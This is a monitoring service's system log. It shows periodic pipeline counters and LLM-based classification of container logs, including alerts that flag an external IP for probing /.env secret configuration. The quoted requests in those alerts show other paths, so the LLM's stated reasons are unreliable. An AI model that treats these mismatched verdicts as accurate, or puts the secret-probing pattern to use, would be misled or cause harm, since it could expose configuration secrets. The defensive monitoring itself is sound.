Mar 20 05:59:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:54.411055 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 06:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:01.940128 [observer] Pipeline: processed=2220 pattern_hits=2177 llm_calls=43 llm_errors=0 learned=0
Mar 20 06:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:01.940178 [observer] Patterns: hash=2177 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=43
Mar 20 06:00:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:05.012810 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 06:00:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:05.012849 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 06:00:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:11.282388 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 06:00:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:11.282429 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 06:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:31.947473 [observer] Pipeline: processed=2223 pattern_hits=2179 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:31.947496 [observer] Patterns: hash=2179 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:01.956038 [observer] Pipeline: processed=2227 pattern_hits=2183 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:01.956073 [observer] Patterns: hash=2183 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:31.935204 [observer] Pipeline: processed=2229 pattern_hits=2185 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:31.935223 [observer] Patterns: hash=2185 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:01.941210 [observer] Pipeline: processed=2233 pattern_hits=2189 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:01.941234 [observer] Patterns: hash=2189 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:31.941879 [observer] Pipeline: processed=2235 pattern_hits=2191 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:31.941908 [observer] Patterns: hash=2191 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:01.965011 [observer] Pipeline: processed=2239 pattern_hits=2195 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:01.969320 [observer] Patterns: hash=2195 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:31.933877 [observer] Pipeline: processed=2241 pattern_hits=2197 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:31.933901 [observer] Patterns: hash=2197 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:01.972581 [observer] Pipeline: processed=2245 pattern_hits=2201 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:01.972620 [observer] Patterns: hash=2201 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:31.935202 [observer] Pipeline: processed=2249 pattern_hits=2205 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:31.935231 [observer] Patterns: hash=2205 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:01.944111 [observer] Pipeline: processed=2251 pattern_hits=2207 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:01.944138 [observer] Patterns: hash=2207 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:31.933906 [observer] Pipeline: processed=2255 pattern_hits=2211 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:31.933929 [observer] Patterns: hash=2211 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:01.949033 [observer] Pipeline: processed=2257 pattern_hits=2213 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:01.949065 [observer] Patterns: hash=2213 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:31.935234 [observer] Pipeline: processed=2261 pattern_hits=2217 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:31.935259 [observer] Patterns: hash=2217 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:01.940502 [observer] Pipeline: processed=2263 pattern_hits=2219 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:01.940526 [observer] Patterns: hash=2219 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:31.935103 [observer] Pipeline: processed=2265 pattern_hits=2221 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:31.935129 [observer] Patterns: hash=2221 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:01.937537 [observer] Pipeline: processed=2269 pattern_hits=2225 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:01.937563 [observer] Patterns: hash=2225 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:31.933693 [observer] Pipeline: processed=2271 pattern_hits=2227 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:31.933721 [observer] Patterns: hash=2227 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:01.956770 [observer] Pipeline: processed=2277 pattern_hits=2233 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:01.956810 [observer] Patterns: hash=2233 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:31.938837 [observer] Pipeline: processed=2279 pattern_hits=2235 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:31.938862 [observer] Patterns: hash=2235 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:01.943430 [observer] Pipeline: processed=2283 pattern_hits=2239 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:01.944570 [observer] Patterns: hash=2239 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:31.941900 [observer] Pipeline: processed=2285 pattern_hits=2241 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:31.941933 [observer] Patterns: hash=2241 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:01.958507 [observer] Pipeline: processed=2287 pattern_hits=2243 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:01.958536 [observer] Patterns: hash=2243 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:31.938817 [observer] Pipeline: processed=2291 pattern_hits=2247 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:31.938846 [observer] Patterns: hash=2247 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:01.973095 [observer] Pipeline: processed=2293 pattern_hits=2249 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:01.973128 [observer] Patterns: hash=2249 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:31.933859 [observer] Pipeline: processed=2297 pattern_hits=2253 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:31.933882 [observer] Patterns: hash=2253 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:01.945638 [observer] Pipeline: processed=2299 pattern_hits=2255 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:01.945667 [observer] Patterns: hash=2255 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:31.934474 [observer] Pipeline: processed=2303 pattern_hits=2259 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:31.934497 [observer] Patterns: hash=2259 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:01.955976 [observer] Pipeline: processed=2307 pattern_hits=2263 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:01.956014 [observer] Patterns: hash=2263 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:31.950658 [observer] Pipeline: processed=2309 pattern_hits=2265 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:31.950684 [observer] Patterns: hash=2265 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:01.944203 [observer] Pipeline: processed=2313 pattern_hits=2269 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:01.944242 [observer] Patterns: hash=2269 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:31.933905 [observer] Pipeline: processed=2315 pattern_hits=2271 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:31.933932 [observer] Patterns: hash=2271 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:01.951629 [observer] Pipeline: processed=2319 pattern_hits=2275 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:01.951661 [observer] Patterns: hash=2275 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:31.933708 [observer] Pipeline: processed=2321 pattern_hits=2277 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:31.933767 [observer] Patterns: hash=2277 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:01.941792 [observer] Pipeline: processed=2324 pattern_hits=2280 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:01.941824 [observer] Patterns: hash=2280 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:31.943065 [observer] Pipeline: processed=2327 pattern_hits=2283 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:31.943094 [observer] Patterns: hash=2283 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:02.052520 [observer] Pipeline: processed=2329 pattern_hits=2285 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:02.056796 [observer] Patterns: hash=2285 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:31.934944 [observer] Pipeline: processed=2333 pattern_hits=2289 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:31.934973 [observer] Patterns: hash=2289 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:01.944822 [observer] Pipeline: processed=2337 pattern_hits=2293 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:01.944850 [observer] Patterns: hash=2293 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:31.935672 [observer] Pipeline: processed=2341 pattern_hits=2297 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:31.935696 [observer] Patterns: hash=2297 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:01.958475 [observer] Pipeline: processed=2343 pattern_hits=2299 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:01.958505 [observer] Patterns: hash=2299 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:31.933823 [observer] Pipeline: processed=2346 pattern_hits=2302 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:31.933846 [observer] Patterns: hash=2302 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:01.945242 [observer] Pipeline: processed=2349 pattern_hits=2305 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:01.945550 [observer] Patterns: hash=2305 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:31.951670 [observer] Pipeline: processed=2351 pattern_hits=2307 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:31.951704 [observer] Patterns: hash=2307 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:01.936394 [observer] Pipeline: processed=2355 pattern_hits=2311 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:01.936423 [observer] Patterns: hash=2311 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:31.944053 [observer] Pipeline: processed=2357 pattern_hits=2313 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:31.944085 [observer] Patterns: hash=2313 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:01.948116 [observer] Pipeline: processed=2361 pattern_hits=2317 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:01.950583 [observer] Patterns: hash=2317 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:31.933729 [observer] Pipeline: processed=2363 pattern_hits=2319 llm_calls=44 llm_errors=0 learned=0
Mar 20 06:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:31.933755 [observer] Patterns: hash=2319 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44
Mar 20 06:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:52.700228 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T06:23:52.699986007Z 159.89.235.121 - - [20/Mar/2026:06:23:52 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefo...
Mar 20 06:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:52.868967 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T06:23:52.868687960Z 159.89.235.121 - - [20/Mar/2026:06:23:52 +0000] "media.admin.kovicloud.com" "GET /favicon.ico HTTP/1.1" 302 138 "http://media.admin.kovicloud.com/" "Mozilla/5.0 (X11; Li...
Mar 20 06:23:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:53.211435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T06:23:53.211156241Z 159.89.235.121 - - [20/Mar/2026:06:23:53 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 06:24:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:00.850967 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 06:24:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:00.851019 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 06:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:01.950350 [observer] Pipeline: processed=2372 pattern_hits=2327 llm_calls=45 llm_errors=0 learned=0
Mar 20 06:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:01.950376 [observer] Patterns: hash=2327 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=45
Mar 20 06:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:31.933852 [observer] Pipeline: processed=2375 pattern_hits=2330 llm_calls=45 llm_errors=0 learned=0
Mar 20 06:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:31.933876 [observer] Patterns: hash=2330 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=45
Mar 20 06:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:01.949400 [observer] Pipeline: processed=2378 pattern_hits=2332 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:01.954439 [observer] Patterns: hash=2332 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:25:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:06.603761 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.83 action=allow pattern_type=prefix
Mar 20 06:25:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:06.603803 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 06:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:31.938794 [observer] Pipeline: processed=2382 pattern_hits=2336 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:31.938827 [observer] Patterns: hash=2336 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:01.995015 [observer] Pipeline: processed=2384 pattern_hits=2338 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:01.995045 [observer] Patterns: hash=2338 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:31.934828 [observer] Pipeline: processed=2388 pattern_hits=2342 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:31.934855 [observer] Patterns: hash=2342 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:01.980422 [observer] Pipeline: processed=2390 pattern_hits=2344 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:01.980459 [observer] Patterns: hash=2344 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:31.936275 [observer] Pipeline: processed=2393 pattern_hits=2347 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:31.936307 [observer] Patterns: hash=2347 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:01.966316 [observer] Pipeline: processed=2396 pattern_hits=2350 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:01.966352 [observer] Patterns: hash=2350 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:31.950674 [observer] Pipeline: processed=2398 pattern_hits=2352 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:31.950699 [observer] Patterns: hash=2352 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:01.942599 [observer] Pipeline: processed=2404 pattern_hits=2358 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:01.942630 [observer] Patterns: hash=2358 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:31.944784 [observer] Pipeline: processed=2406 pattern_hits=2360 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:31.944811 [observer] Patterns: hash=2360 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:01.936566 [observer] Pipeline: processed=2410 pattern_hits=2364 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:01.936592 [observer] Patterns: hash=2364 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:31.933747 [observer] Pipeline: processed=2412 pattern_hits=2366 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:31.933772 [observer] Patterns: hash=2366 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:01.945739 [observer] Pipeline: processed=2415 pattern_hits=2369 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:01.945771 [observer] Patterns: hash=2369 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:31.933969 [observer] Pipeline: processed=2418 pattern_hits=2372 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:31.933992 [observer] Patterns: hash=2372 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:01.968108 [observer] Pipeline: processed=2420 pattern_hits=2374 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:01.968138 [observer] Patterns: hash=2374 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:31.936140 [observer] Pipeline: processed=2424 pattern_hits=2378 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:31.936199 [observer] Patterns: hash=2378 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:02.002425 [observer] Pipeline: processed=2426 pattern_hits=2380 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:02.002454 [observer] Patterns: hash=2380 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:31.934813 [observer] Pipeline: processed=2430 pattern_hits=2384 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:31.934846 [observer] Patterns: hash=2384 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
